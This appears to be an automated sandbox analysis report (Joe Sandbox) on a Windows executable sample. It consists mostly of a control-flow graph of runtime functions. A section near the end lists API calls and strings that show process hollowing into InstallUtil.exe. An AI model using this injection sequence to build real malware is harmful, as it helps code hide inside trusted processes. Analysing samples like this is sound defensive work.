1323a20 18743->18907 18745 1324cf7 18916 13220c0 18745->18916 18747 1324cf2 18747->18745 18912 1327bb5 18747->18912 18748 1324e2f 18749 1324e42 18748->18749 18926 13246d0 18748->18926 18749->17971 18753 1323a20 41 API calls 18752->18753 18754 1322cd1 18753->18754 18757 1322cfd 18754->18757 19145 1324e70 18754->19145 18755 13220c0 std::ios_base::_Init 41 API calls 18758 1322dca 18755->18758 18757->18755 18759 1322ddd 18758->18759 18760 13246d0 41 API calls 18758->18760 18759->17971 18760->18759 18762 1324a02 18761->18762 18763 1323a20 41 API calls 18762->18763 18764 1324a51 18763->18764 18765 1324a57 18764->18765 18766 1325390 70 API calls 18764->18766 18767 13220c0 std::ios_base::_Init 41 API calls 18765->18767 18771 1324a8a std::ios_base::_Ios_base_dtor 18766->18771 18769 1324c32 18767->18769 18768 1324c45 18768->17971 18769->18768 18770 13246d0 41 API calls 18769->18770 18770->18768 18772 1324ae2 18771->18772 19421 1324970 18771->19421 18772->18765 18773 1324b83 18772->18773 18776 1324970 69 API calls 18772->18776 18773->18765 18775 1324970 69 API calls 18773->18775 18775->18773 18776->18772 18778 1326610 std::_Lockit::_Lockit 3 API calls 18777->18778 18779 13253c1 18778->18779 18780 1326610 std::_Lockit::_Lockit 3 API calls 18779->18780 18786 1325402 18779->18786 18781 13253de 18780->18781 18784 1326668 std::_Lockit::~_Lockit 2 API calls 18781->18784 18782 1325421 18783 1326668 std::_Lockit::~_Lockit 2 API calls 18782->18783 18785 132542d 18783->18785 18784->18786 18787 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18785->18787 18786->18782 18788 1329a1a std::ios_base::_Init 3 API calls 18786->18788 18789 132299e 18787->18789 18790 1325473 18788->18790 18820 1325c70 18789->18820 18791 1326610 std::_Lockit::_Lockit 3 API calls 18790->18791 18792 132549f 18791->18792 18793 1325608 18792->18793 18794 13254e9 18792->18794 18795 13267d7 codecvt 41 API calls 18793->18795 18796 1327ff1 std::_Locinfo::_Locinfo_ctor 67 API calls 18794->18796 18798 1325612 18795->18798 18797 13254f4 18796->18797 19499 1329200 18797->19499 18821 1323a20 41 API calls 18820->18821 18823 1325cae 18821->18823 18822 1325cb4 18825 13220c0 std::ios_base::_Init 41 API calls 18822->18825 18823->18822 18824 1324970 69 API calls 18823->18824 18824->18822 18826 1325d3b 18825->18826 18827 13229d7 18826->18827 18828 13246d0 41 API calls 18826->18828 18829 13245c0 18827->18829 18828->18827 18830 1324604 18829->18830 18837 1324691 18829->18837 18885 1326797 18876->18885 18880 132130b std::ios_base::_Init 18879->18880 18881 132a8b0 Concurrency::cancel_current_task RaiseException 18880->18881 18882 132131a 18881->18882 18883 132a80b ___std_exception_copy 40 API calls 18882->18883 18884 1321341 18883->18884 18884->18729 18890 13266ba 18885->18890 18889 13267b6 18896 1321200 18890->18896 18893 132a8b0 18894 132a8f7 RaiseException 18893->18894 18895 132a8ca 18893->18895 18894->18889 18895->18894 18901 132a80b 18896->18901 18899 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18900 1321249 18899->18900 18900->18893 18902 1321238 18901->18902 18904 132a818 _Yarn 18901->18904 18902->18899 18903 132a845 18906 1330c33 _Yarn 10 API calls 18903->18906 18904->18902 18904->18903 18905 1336bc9 ___std_exception_copy 40 API calls 18904->18905 18905->18903 18906->18902 18908 1323a3c 18907->18908 18909 1323a50 18908->18909 18910 13245c0 41 API calls 18908->18910 18909->18747 18911 1323a6f 18910->18911 18911->18747 18913 1327bc4 18912->18913 18914 1327bd7 _Yarn 18912->18914 18913->18745 18914->18913 18930 1332268 18914->18930 18917 13220da 18916->18917 18917->18748 18918 132a8b0 Concurrency::cancel_current_task RaiseException 18917->18918 18919 13220f2 std::ios_base::_Init 18917->18919 18918->18919 19055 1322010 18919->19055 18921 1322128 18927 1324733 18926->18927 18928 132470e 18926->18928 18927->18749 18928->18927 19142 1323aa0 18928->19142 18931 133227b _Fputc 18930->18931 18936 1332047 18931->18936 18933 1332290 18934 132f150 _Fputc 40 API calls 18933->18934 18935 133229d 18934->18935 18935->18913 18937 133207d 18936->18937 18938 1332055 18936->18938 18937->18933 18938->18937 18939 1332062 18938->18939 18940 1332084 18938->18940 18942 1330ef0 _Fputc 40 API calls 18939->18942 18944 1331fa0 18940->18944 18942->18937 18945 1331fac ___scrt_is_nonwritable_in_current_image 18944->18945 18952 132e2f8 EnterCriticalSection 18945->18952 18947 1331fba 18953 1331ffb 18947->18953 18952->18947 18963 1338df9 18953->18963 18960 1331fef 19054 132e30c LeaveCriticalSection 18960->19054 18962 1331fd8 18962->18933 18983 1338dbe 18963->18983 18965 1338e0a 18966 1332013 18965->18966 18967 1337e20 __strnicoll 11 API calls 18965->18967 18970 13320be 18966->18970 18968 1338e64 18967->18968 18969 133737f ___free_lconv_mon 10 API calls 18968->18969 18969->18966 18971 1332031 18970->18971 18973 13320d0 18970->18973 18979 1338ea5 18971->18979 18972 13320de 18974 1330ef0 _Fputc 40 API calls 18972->18974 18973->18971 18973->18972 18976 1332114 _Yarn _Fputc 18973->18976 18974->18971 18976->18971 18977 1338d82 _Ungetc 40 API calls 18976->18977 19005 13314c7 18976->19005 19011 133a9dc 18976->19011 18977->18976 18980 1331fc7 18979->18980 18981 1338eb0 18979->18981 18980->18960 18981->18980 18982 13314c7 ___scrt_uninitialize_crt 65 API calls 18981->18982 18982->18980 18985 1338dca 18983->18985 18984 1338deb 18984->18965 18985->18984 18989 1338d82 18985->18989 18987 1338de5 18996 1344a83 18987->18996 18990 1338da3 18989->18990 18991 1338d8e 18989->18991 18990->18987 18992 133106b __dosmaperr 10 API calls 18991->18992 18993 1338d93 18992->18993 18994 1330f6d __strnicoll 40 API calls 18993->18994 18995 1338d9e 18994->18995 18995->18987 18997 1344a90 18996->18997 18999 1344a9d 18996->18999 18998 133106b __dosmaperr 10 API calls 18997->18998 19001 1344a95 18998->19001 19000 133106b __dosmaperr 10 API calls 18999->19000 19002 1344aa9 18999->19002 19003 1344aca 19000->19003 19001->18984 19002->18984 19004 1330f6d __strnicoll 40 API calls 19003->19004 19004->19001 19006 13314e0 19005->19006 19010 1331507 19005->19010 19007 1338d82 _Ungetc 40 API calls 19006->19007 19006->19010 19008 13314fc 19007->19008 19009 133a9dc ___scrt_uninitialize_crt 65 API calls 19008->19009 19009->19010 19010->18976 19012 133a9e8 ___scrt_is_nonwritable_in_current_image 19011->19012 19013 133aaac 19012->19013 19015 133aa3d 19012->19015 19021 133a9f0 19012->19021 19014 1330ef0 _Fputc 40 API calls 19013->19014 19014->19021 19022 1340634 EnterCriticalSection 19015->19022 19021->18976 19054->18962 19056 1322050 19055->19056 19056->19056 19072 13250a0 19056->19072 19058 1322066 19080 1321460 19058->19080 19060 132209f codecvt 19060->18921 19061 1322077 19061->19060 19062 1330f7d std::ios_base::_Init 40 API calls 19061->19062 19063 13220be 19062->19063 19063->18921 19073 1325127 19072->19073 19077 13250b9 19072->19077 19118 1321380 19073->19118 19075 13250c5 _Yarn 19075->19058 19077->19075 19104 1325e50 19077->19104 19079 1325102 _Yarn 19079->19058 19081 13214a3 19080->19081 19082 13216f1 19081->19082 19085 13214b8 19081->19085 19083 1321380 std::ios_base::_Init 41 API calls 19082->19083 19084 13216f6 19083->19084 19086 1330f7d std::ios_base::_Init 40 API calls 19084->19086 19088 1325e50 std::ios_base::_Init 41 API calls 19085->19088 19089 13214c5 _Yarn 19085->19089 19087 13216fb 19086->19087 19091 1330f7d std::ios_base::_Init 40 API calls 19087->19091 19088->19089 19090 1321540 19089->19090 19123 1325230 19089->19123 19096 1325230 std::ios_base::_Init 41 API calls 19090->19096 19097 13215ba _Yarn 19090->19097 19092 1321700 19091->19092 19138 132a86e 19092->19138 19095 1321722 codecvt 19095->19061 19096->19097 19097->19084 19098 1321630 codecvt 19097->19098 19099 132a80b ___std_exception_copy 40 API calls 19098->19099 19100 132168c 19099->19100 19100->19087 19101 13216bd codecvt 19100->19101 19102 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19101->19102 19103 13216eb 19102->19103 19103->19061 19105 1325e5b 19104->19105 19106 1325e7d 19104->19106 19107 1325e92 19105->19107 19108 1325e62 19105->19108 19109 1325e8d 19106->19109 19111 1329a1a std::ios_base::_Init 3 API calls 19106->19111 19112 1321300 std::ios_base::_Init 41 API calls 19107->19112 19110 1329a1a std::ios_base::_Init 3 API calls 19108->19110 19109->19079 19114 1325e68 19110->19114 19113 1325e87 19111->19113 19112->19114 19113->19079 19115 1330f7d std::ios_base::_Init 40 API calls 19114->19115 19116 1325e71 19114->19116 19117 1325e9c 19115->19117 19116->19079 19119 1326797 std::ios_base::_Init 41 API calls 19118->19119 19120 132138a 19119->19120 19121 132a80b ___std_exception_copy 40 API calls 19120->19121 19122 13213b1 19121->19122 19124 1325380 19123->19124 19125 1325257 19123->19125 19126 1321380 std::ios_base::_Init 41 API calls 19124->19126 19129 13252c6 19125->19129 19130 13252b9 19125->19130 19132 1325270 19125->19132 19127 1325385 19126->19127 19128 1321300 std::ios_base::_Init 41 API calls 19127->19128 19136 1325280 _Yarn 19128->19136 19134 1329a1a std::ios_base::_Init 3 API calls 19129->19134 19129->19136 19130->19127 19130->19132 19131 1329a1a std::ios_base::_Init 3 API calls 19131->19136 19132->19131 19133 1330f7d std::ios_base::_Init 40 API calls 19135 132538f 19133->19135 19134->19136 19136->19133 19137 1325339 _Yarn codecvt 19136->19137 19137->19090 19139 132a882 19138->19139 19140 132a87b 19138->19140 19139->19095 19141 1330c33 _Yarn 10 API calls 19140->19141 19141->19139 19143 13220c0 std::ios_base::_Init 41 API calls 19142->19143 19144 1323abf 19143->19144 19144->18927 19184 1326610 19145->19184 19148 1326610 std::_Lockit::_Lockit 3 API calls 19149 1324eaf 19148->19149 19190 1326668 19149->19190 19150 1326668 std::_Lockit::~_Lockit 2 API calls 19153 1324ef8 19150->19153 19151 1324ed0 19154 1324eef 19151->19154 19156 1329a1a std::ios_base::_Init 3 API calls 19151->19156 19155 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19153->19155 19154->19150 19157 1324f09 19155->19157 19158 1324f38 19156->19158 19157->18757 19159 1326610 std::_Lockit::_Lockit 3 API calls 19158->19159 19160 1324f64 19159->19160 19161 1324fae 19160->19161 19162 132508d 19160->19162 19197 1327ff1 19161->19197 19213 13267d7 19162->19213 19185 1326626 19184->19185 19186 132661f 19184->19186 19189 1324e95 19185->19189 19223 13294cd EnterCriticalSection 19185->19223 19218 133111e 19186->19218 19189->19148 19189->19151 19191 1326672 19190->19191 19192 133112c 19190->19192 19193 1326685 19191->19193 19275 13294db LeaveCriticalSection 19191->19275 19276 1331107 LeaveCriticalSection 19192->19276 19193->19151 19196 1331133 19196->19151 19277 133286c 19197->19277 19418 132672e 19213->19418 19216 132a8b0 Concurrency::cancel_current_task RaiseException 19217 13267f6 19216->19217 19224 1337ac2 19218->19224 19223->19189 19245 1337471 19224->19245 19246 133765a std::_Lockit::_Lockit GetProcAddress 19245->19246 19247 1337487 19246->19247 19248 133748b 19247->19248 19249 133765a std::_Lockit::_Lockit GetProcAddress 19248->19249 19250 13374a1 19249->19250 19251 13374a5 19250->19251 19252 133765a std::_Lockit::_Lockit GetProcAddress 19251->19252 19253 13374bb 19252->19253 19254 13374bf 19253->19254 19255 133765a std::_Lockit::_Lockit GetProcAddress 19254->19255 19275->19193 19276->19196 19278 1337ac2 std::_Lockit::_Lockit GetProcAddress 19277->19278 19279 1332879 19278->19279 19286 1332617 19279->19286 19287 1332623 ___scrt_is_nonwritable_in_current_image 19286->19287 19419 1321200 std::invalid_argument::invalid_argument 40 API calls 19418->19419 19420 1326740 19419->19420 19420->19216 19422 1324978 19421->19422 19423 1324981 19422->19423 19426 1328956 19422->19426 19423->18771 19428 1328977 19426->19428 19431 132897b 19426->19431 19427 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19429 13249a4 19427->19429 19428->19427 19429->18771 19431->19428 19432 1328a31 19431->19432 19434 13289bf 19431->19434 19432->19428 19433 1332268 68 API calls 19432->19433 19433->19428 19434->19428 19435 1328132 19434->19435 19438 1332c87 19435->19438 19439 1332c9a _Fputc 19438->19439 19444 1332a8b 19439->19444 19445 1332a97 ___scrt_is_nonwritable_in_current_image 19444->19445 19446 1332ac3 19445->19446 19447 1332a9e 19445->19447 19455 132e2f8 EnterCriticalSection 19446->19455 19449 1330ef0 _Fputc 40 API calls 19447->19449 19451 1332ab9 19449->19451 19450 1332ad2 19455->19450 19521 13330b4 19499->19521 19501 1329209 __Getctype 19522 1339221 __Getctype 40 API calls 19521->19522 19523 13330bf 19522->19523 19524 1337e6e __Getctype 40 API calls 19523->19524 19525 13330cf 19524->19525 19525->19501 19837 1334ce7 19836->19837 19838 1334cf9 19836->19838 19863 1334d82 GetModuleHandleW 19837->19863 19848 1334b82 19838->19848 19842 1329cb9 19842->18022 19849 1334b8e ___scrt_is_nonwritable_in_current_image 19848->19849 19871 13310bf EnterCriticalSection 19849->19871 19851 1334b98 19872 1334bcf 19851->19872 19853 1334ba5 19876 1334bc3 19853->19876 19856 1334d51 19907 1334dc5 19856->19907 19859 1334d6f 19861 1334de7 __CreateFrameInfo 3 API calls 19859->19861 19860 1334d5f GetCurrentProcess TerminateProcess 19860->19859 19862 1334d77 ExitProcess 19861->19862 19864 1334cec 19863->19864 19864->19838 19865 1334de7 GetModuleHandleExW 19864->19865 19866 1334e47 19865->19866 19867 1334e26 GetProcAddress 19865->19867 19869 1334cf8 19866->19869 19870 1334e4d FreeLibrary 19866->19870 19867->19866 19868 1334e3a 19867->19868 19868->19866 19869->19838 19870->19869 19871->19851 19873 1334bdb ___scrt_is_nonwritable_in_current_image 19872->19873 19875 1334c42 __CreateFrameInfo 19873->19875 19879 1336957 19873->19879 19875->19853 19906 1331107 LeaveCriticalSection 19876->19906 19878 1334bb1 19878->19842 19878->19856 19880 1336963 __EH_prolog3 19879->19880 19883 13366af 19880->19883 19882 133698a std::ios_base::_Init 19882->19875 19884 13366bb ___scrt_is_nonwritable_in_current_image 19883->19884 19891 13310bf EnterCriticalSection 19884->19891 19886 13366c9 19892 1336867 19886->19892 19891->19886 19894 1336886 19892->19894 19895 13366d6 19892->19895 19893 1336914 19893->19895 19896 133737f ___free_lconv_mon 10 API calls 19893->19896 19894->19893 19894->19895 19901 1329735 19894->19901 19898 13366fe 19895->19898 19896->19895 19905 1331107 LeaveCriticalSection 19898->19905 19900 13366e7 19900->19882 19902 1329775 19901->19902 19903 132975a RtlDecodePointer 19902->19903 19904 132978a 19902->19904 19903->19902 19904->19894 19905->19900 19906->19878 19912 13404b5 GetPEB 19907->19912 19910 1334d5b 19910->19859 19910->19860 19911 1334dcf GetPEB 19911->19910 19913 1334dca 19912->19913 19914 13404cf 19912->19914 19913->19910 19913->19911 19916 13376dd 19914->19916 19917 133765a std::_Lockit::_Lockit GetProcAddress 19916->19917 19918 13376f9 19917->19918 19918->19913 20013 1337591 20019 13375a0 ___vcrt_FlsGetValue 20013->20019 20014 1337636 20015 13375be LoadLibraryExW 20016 13375d9 GetLastError 20015->20016 20017 133763d 20015->20017 20016->20019 20017->20014 20018 133764f FreeLibrary 20017->20018 20018->20014 20019->20014 20019->20015 20020 133760c LoadLibraryExW 20019->20020 20020->20017 20020->20019 20281 133b684 20282 1338d82 _Ungetc 40 API calls 20281->20282 20283 133b691 20282->20283 20284 133b69d 20283->20284 20285 133b6e9 20283->20285 20304 133ba1a 20283->20304 20285->20284 20286 133b74b 20285->20286 20288 1338dbe 40 API calls 20285->20288 20293 133b874 20286->20293 20290 133b73e 20288->20290 20290->20286 20312 133c693 20290->20312 20294 1338d82 _Ungetc 40 API calls 20293->20294 20295 133b883 20294->20295 20296 133b896 20295->20296 20297 133b929 20295->20297 20299 133b8b3 20296->20299 20302 133b8da 20296->20302 20298 133a9dc ___scrt_uninitialize_crt 65 API calls 20297->20298 20301 133b75c 20298->20301 20300 133a9dc ___scrt_uninitialize_crt 65 API calls 20299->20300 20300->20301 20302->20301 20317 133c5d7 20302->20317 20305 133ba30 20304->20305 20306 133ba34 20304->20306 20305->20285 20307 134070b ___scrt_uninitialize_crt 40 API calls 20306->20307 20311 133ba83 20306->20311 20308 133ba55 20307->20308 20309 133ba5d SetFilePointerEx 20308->20309 20308->20311 20310 133ba74 GetFileSizeEx 20309->20310 20309->20311 20310->20311 20311->20285 20313 1337322 __Getctype 10 API calls 20312->20313 20314 133c6b0 20313->20314 20315 133737f ___free_lconv_mon 10 API calls 20314->20315 20316 133c6ba 20315->20316 20316->20286 20318 133c5eb _Fputc 20317->20318 20323 133c42e 20318->20323 20321 132f150 _Fputc 40 API calls 20322 133c60f 20321->20322 20322->20301 20325 133c43a ___scrt_is_nonwritable_in_current_image 20323->20325 20324 133c442 20324->20321 20325->20324 20326 133c518 20325->20326 20328 133c496 20325->20328 20327 1330ef0 _Fputc 40 API calls 20326->20327 20327->20324 20334 1340634 EnterCriticalSection 20328->20334 20330 133c4c1 20341 133c510 20330->20341 20331 133c49c 20331->20330 20335 133c554 20331->20335 20334->20331 20336 134070b ___scrt_uninitialize_crt 40 API calls 20335->20336 20337 133c566 20336->20337 20338 133c582 SetFilePointerEx 20337->20338 20340 133c56e ___scrt_uninitialize_crt 20337->20340 20339 133c59a GetLastError 20338->20339 20338->20340 20339->20340 20340->20330 20344 1340657 LeaveCriticalSection 20341->20344 20343 133c516 20343->20324 20344->20343 22093 132738a 22094 13273a6 22093->22094 22096 13273ad 22093->22096 22095 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22094->22095 22097 1327490 22095->22097 22096->22094 22098 13273f6 22096->22098 22100 1327453 22096->22100 22098->22094 22102 1326817 22098->22102 22100->22094 22101 1332268 68 API calls 22100->22101 22101->22094 22105 13318fb 22102->22105 22106 133190e _Fputc 22105->22106 22111 13317a1 22106->22111 22108 133191d 22109 132f150 _Fputc 40 API calls 22108->22109 22110 1326827 22109->22110 22110->22094 22112 13317ad ___scrt_is_nonwritable_in_current_image 22111->22112 22113 13317b6 22112->22113 22114 13317da 22112->22114 22115 1330ef0 _Fputc 40 API calls 22113->22115 22125 132e2f8 EnterCriticalSection 22114->22125 22124 13317cf _Fputc 22115->22124 22117 13317e3 22118 133188e _Fputc 22117->22118 22119 1338d82 _Ungetc 40 API calls 22117->22119 22126 13318c6 22118->22126 22121 13317fc 22119->22121 22121->22118 22122 133185d 22121->22122 22123 1330ef0 _Fputc 40 API calls 22122->22123 22123->22124 22124->22108 22125->22117 22129 132e30c LeaveCriticalSection 22126->22129 22128 13318cc 22128->22124 22129->22128 23553 13270e4 23554 1327137 23553->23554 23555 13270eb 23553->23555 23558 132e2f8 EnterCriticalSection 23555->23558 23557 13270f0 23558->23557 23559 1328ce4 23560 1328cf0 __EH_prolog3_GS 23559->23560 23562 1328d3f 23560->23562 23566 1328d07 23560->23566 23568 1328d59 23560->23568 23561 1329f36 5 API calls 23563 1328e23 23561->23563 23573 132810b 23562->23573 23565 133163a 42 API calls 23565->23568 23566->23561 23567 132751c 41 API calls 23567->23568 23568->23565 23568->23567 23570 1328e08 23568->23570 23572 1328e43 23568->23572 23569 1322f70 99 API calls 23569->23566 23570->23569 23571 1332599 42 API calls 23571->23572 23572->23570 23572->23571 23576 1332a14 23573->23576 23577 1332a20 ___scrt_is_nonwritable_in_current_image 23576->23577 23578 1332a27 23577->23578 23579 1332a3e 23577->23579 23580 133106b __dosmaperr 10 API calls 23578->23580 23589 132e2f8 EnterCriticalSection 23579->23589 23582 1332a2c 23580->23582 23584 1330f6d __strnicoll 40 API calls 23582->23584 23583 1332a4a 23590 13328a4 23583->23590 23586 1328116 23584->23586 23586->23566 23587 1332a55 23617 1332a83 23587->23617 23589->23583 23591 13328c1 23590->23591 23593 13328ea 23590->23593 23592 1338d82 _Ungetc 40 API calls 23591->23592 23594 13328c7 23592->23594 23595 1338d82 _Ungetc 40 API calls 23593->23595 23616 1332905 23593->23616 23594->23593 23597 1338d82 _Ungetc 40 API calls 23594->23597 23596 133293c 23595->23596 23598 1338d82 _Ungetc 40 API calls 23596->23598 23604 133295f 23596->23604 23599 13328d3 23597->23599 23600 1332948 23598->23600 23599->23593 23601 1338d82 _Ungetc 40 API calls 23599->23601 23603 1338d82 _Ungetc 40 API calls 23600->23603 23600->23604 23602 13328df 23601->23602 23605 1338d82 _Ungetc 40 API calls 23602->23605 23606 1332954 23603->23606 23607 1332f77 __Getctype 40 API calls 23604->23607 23604->23616 23605->23593 23608 1338d82 _Ungetc 40 API calls 23606->23608 23611 1332997 23607->23611 23608->23604 23609 13329c1 23620 1338d4b 23609->23620 23611->23609 23613 13329ae 23611->23613 23614 1332599 42 API calls 23613->23614 23614->23616 23615 133106b __dosmaperr 10 API calls 23615->23616 23616->23587 23645 132e30c LeaveCriticalSection 23617->23645 23619 1332a89 23619->23586 23621 1338d5e _Fputc 23620->23621 23626 1338c18 23621->23626 23624 132f150 _Fputc 40 API calls 23625 13329d5 23624->23625 23625->23615 23625->23616 23628 1338c2c 23626->23628 23635 1338c3c 23626->23635 23627 1338c61 23630 1338c72 23627->23630 23631 1338c95 23627->23631 23628->23627 23629 1330830 _Fputc 40 API calls 23628->23629 23628->23635 23629->23627 23638 1344938 23630->23638 23633 1338d11 23631->23633 23634 1338cbd 23631->23634 23631->23635 23636 133ec5f __strnicoll MultiByteToWideChar 23633->23636 23634->23635 23637 133ec5f __strnicoll MultiByteToWideChar 23634->23637 23635->23624 23636->23635 23637->23635 23641 13463f3 23638->23641 23644 134641e _Fputc 23641->23644 23642 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23643 1344953 23642->23643 23643->23635 23644->23642 23645->23619 23666 13390e8 23667 13390f3 23666->23667 23671 1339103 23666->23671 23672 1339109 23667->23672 23670 133737f ___free_lconv_mon 10 API calls 23670->23671 23673 1339124 23672->23673 23674 133911e 23672->23674 23676 133737f ___free_lconv_mon 10 API calls 23673->23676 23675 133737f ___free_lconv_mon 10 API calls 23674->23675 23675->23673 23677 1339130 23676->23677 23678 133737f ___free_lconv_mon 10 API calls 23677->23678 23679 133913b 23678->23679 23680 133737f ___free_lconv_mon 10 API calls 23679->23680 23681 1339146 23680->23681 23682 133737f ___free_lconv_mon 10 API calls 23681->23682 23683 1339151 23682->23683 23684 133737f ___free_lconv_mon 10 API calls 23683->23684 23685 133915c 23684->23685 23686 133737f ___free_lconv_mon 10 API calls 23685->23686 23687 1339167 23686->23687 23688 133737f ___free_lconv_mon 10 API calls 23687->23688 23689 1339172 23688->23689 23690 133737f ___free_lconv_mon 10 API calls 23689->23690 23691 133917d 23690->23691 23692 133737f ___free_lconv_mon 10 API calls 23691->23692 23693 133918b 23692->23693 23698 1338f35 23693->23698 23699 1338f41 ___scrt_is_nonwritable_in_current_image 23698->23699 23714 13310bf EnterCriticalSection 23699->23714 23701 1338f4b 23704 133737f ___free_lconv_mon 10 API calls 23701->23704 23705 1338f75 23701->23705 23704->23705 23715 1338f94 23705->23715 23706 1338fa0 23707 1338fac ___scrt_is_nonwritable_in_current_image 23706->23707 23719 13310bf EnterCriticalSection 23707->23719 23709 1338fb6 23710 13391d6 __Getctype 10 API calls 23709->23710 23711 1338fc9 23710->23711 23720 1338fe9 23711->23720 23714->23701 23718 1331107 LeaveCriticalSection 23715->23718 23717 1338f82 23717->23706 23718->23717 23719->23709 23723 1331107 LeaveCriticalSection 23720->23723 23722 1338fd7 23722->23670 23723->23722 22227 13279de 22230 13279f0 _Yarn 22227->22230 22228 13279f6 22229 1327aa0 22229->22228 22232 1331b15 __fread_nolock 42 API calls 22229->22232 22230->22228 22230->22229 22233 1331b15 22230->22233 22232->22228 22236 1331b32 22233->22236 22237 1331b3e ___scrt_is_nonwritable_in_current_image 22236->22237 22238 1331b88 22237->22238 22243 1331b51 codecvt 22237->22243 22248 1331b2d 22237->22248 22249 132e2f8 EnterCriticalSection 22238->22249 22240 133106b __dosmaperr 10 API calls 22244 1331b6b 22240->22244 22241 1331b92 22250 133192f 22241->22250 22243->22240 22246 1330f6d __strnicoll 40 API calls 22244->22246 22246->22248 22248->22230 22249->22241 22252 1331940 codecvt 22250->22252 22261 133195c 22250->22261 22251 133194c 22253 133106b __dosmaperr 10 API calls 22251->22253 22252->22251 22260 133199e __fread_nolock 22252->22260 22252->22261 22254 1331951 22253->22254 22255 1330f6d __strnicoll 40 API calls 22254->22255 22255->22261 22256 1331ac5 codecvt 22259 133106b __dosmaperr 10 API calls 22256->22259 22257 1338d82 _Ungetc 40 API calls 22257->22260 22258 1331bcf __fread_nolock 40 API calls 22258->22260 22259->22254 22260->22256 22260->22257 22260->22258 22260->22261 22262 1331bc7 22261->22262 22265 132e30c LeaveCriticalSection 22262->22265 22264 1331bcd 22264->22248 22265->22264 23777 1342ac6 23778 1342adf 23777->23778 23779 1342afd 23777->23779 23778->23779 23780 1337d94 45 API calls 23778->23780 23781 1337ce4 2 API calls 23778->23781 23780->23778 23781->23778

                            Control-flow Graph

                            APIs
                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?), ref: 01322568
                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 01322586
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 01322688
                            • VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00001000,00000004), ref: 013226AE
                            • GetThreadContext.KERNELBASE(?,00000000), ref: 013226E3
                            • ReadProcessMemory.KERNELBASE(?,?,00000044,00000004,00000000), ref: 01322712
                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 01322735
                            • NtWriteVirtualMemory.NTDLL(?,00000000,01356A70,?,00000000), ref: 01322765
                            • TerminateProcess.KERNELBASE(?,00000005), ref: 01322777
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 013227F8
                            • NtWriteVirtualMemory.NTDLL(?,00002000,-01356870,00102A00,00000000), ref: 0132284B
                            • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 01322880
                            • SetThreadContext.KERNELBASE(?,00000000), ref: 0132289B
                            • ResumeThread.KERNELBASE(?), ref: 013228B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$MemoryProcess$ThreadWrite$AllocContextCreateHandleModule$ReadResumeTerminate
                            • String ID: CreateProcessW$D$ET\Framework\v4.0.30319\InstallUtil.exe$GetThreadContext$GetWindowsDirectoryW$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAllocEx$ZwWriteVirtualMemory$\Microsoft.N$kernel32.dll$ntdll.dll
                            • API String ID: 2993083954-3697918027
                            • Opcode ID: 9f682449ec2fbac0442f5b71dc9e0391d091411c06ba66681ca68099ca9ecc1d
                            • Instruction ID: ef7189a7dd2cde3d9a6b0ee592f3ab06dc2c6572508f61f318b9ba39fcc69745
                            • Opcode Fuzzy Hash: 9f682449ec2fbac0442f5b71dc9e0391d091411c06ba66681ca68099ca9ecc1d
                            • Instruction Fuzzy Hash: 0EA1E175A043049FDB209F28CC41B6BB7E5BFC8B48F404A1CFA55AB391DBB0A8448F56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(0132A6C3,01329B33), ref: 0132A6BC
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 128d2ef7118d12fca3dd0424dd269dcdd6a16992f5cecdcc839f08f19e89da38
                            • Instruction ID: a48c43d90ae4980e236f1483a89921e84c6393edf4ab215e51fdc8ee27aa4d29
                            • Opcode Fuzzy Hash: 128d2ef7118d12fca3dd0424dd269dcdd6a16992f5cecdcc839f08f19e89da38
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
